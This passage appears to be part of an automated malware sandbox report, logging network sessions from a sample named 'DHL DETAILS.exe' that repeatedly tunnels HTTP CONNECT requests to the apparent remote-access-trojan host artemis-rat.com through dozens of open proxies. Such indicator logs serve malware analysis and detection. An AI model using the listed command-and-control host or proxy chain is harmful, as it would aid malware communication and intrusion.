64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page --><!
Mar 9, 2024 13:14:13.335818052 CET	199	IN	Data Raw: 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f Data Ascii: -- a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
181	192.168.2.5	50495	72.195.101.99	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.009695053 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
182	192.168.2.5	50657	104.20.179.187	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.011392117 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.166192055 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
183	192.168.2.5	50633	104.21.85.200	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.011646986 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.167182922 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
184	192.168.2.5	50637	192.169.214.249	45108	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.013592958 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
185	192.168.2.5	50519	92.204.134.38	25825	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.014576912 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
186	192.168.2.5	50665	172.67.187.242	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.015960932 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.170766115 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
187	192.168.2.5	50668	104.16.241.204	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.017282009 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.173827887 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
188	192.168.2.5	50437	86.8.163.88	9150	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.023124933 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
189	192.168.2.5	50555	162.243.102.207	9764	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.024579048 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
190	192.168.2.5	50449	121.159.146.251	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.025682926 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
191	192.168.2.5	50630	198.57.229.185	64767	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.025949955 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.504947901 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.067501068 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.208090067 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
192	192.168.2.5	50469	3.9.71.167	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.028671026 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.322750092 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:13 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
193	192.168.2.5	50849	91.231.186.133	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.033453941 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
194	192.168.2.5	50452	120.48.62.239	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.054280043 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.739304066 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.067398071 CET	641	IN	HTTP/1.1 503 Service Unavailable Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: Content-Type,AccessToken,X-CSRF-Token, Authorization, Token Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE,UPDATE Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length, Access-Control-Allow-Origin, Access-Control-Allow-Headers, Content-Type Content-Type: text/plain; charset=utf-8 Set-Cookie: uuid=8b1086ba-de0e-11ee-9749-fa20201ff994; Path=/; Max-Age=8640000; HttpOnly X-Content-Type-Options: nosniff Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Length: 31 Data Raw: 75 6e 73 75 70 70 6f 72 74 65 64 20 70 72 6f 74 6f 63 6f 6c 20 73 63 68 65 6d 65 20 22 22 0a Data Ascii: unsupported protocol scheme ""

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
195	192.168.2.5	50619	162.241.158.204	31794	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.054500103 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.567449093 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.176884890 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
196	192.168.2.5	50411	8.219.177.134	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.054739952 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
197	192.168.2.5	50858	91.231.186.133	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.055129051 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
198	192.168.2.5	50865	91.231.186.133	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.057689905 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
199	192.168.2.5	49806	174.77.111.198	49547	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.057697058 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
200	192.168.2.5	50866	91.231.186.133	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.058723927 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
201	192.168.2.5	50608	92.204.136.149	16691	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.058744907 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.593832016 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.254981041 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.677478075 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.380212069 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.177249908 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
202	192.168.2.5	50465	148.72.209.174	12446	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.069370031 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.770585060 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.770611048 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.781378031 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.868499041 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
203	192.168.2.5	50717	104.24.35.152	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.072571039 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.227313042 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
204	192.168.2.5	50514	18.166.142.180	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.080578089 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
205	192.168.2.5	50521	95.164.89.123	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.080806971 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
206	192.168.2.5	50732	185.162.228.170	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.081983089 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.239219904 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
207	192.168.2.5	50526	161.97.173.42	53948	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.094866991 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.770612001 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
208	192.168.2.5	50689	198.8.84.3	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.096540928 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
209	192.168.2.5	50934	43.153.71.58	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.103990078 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
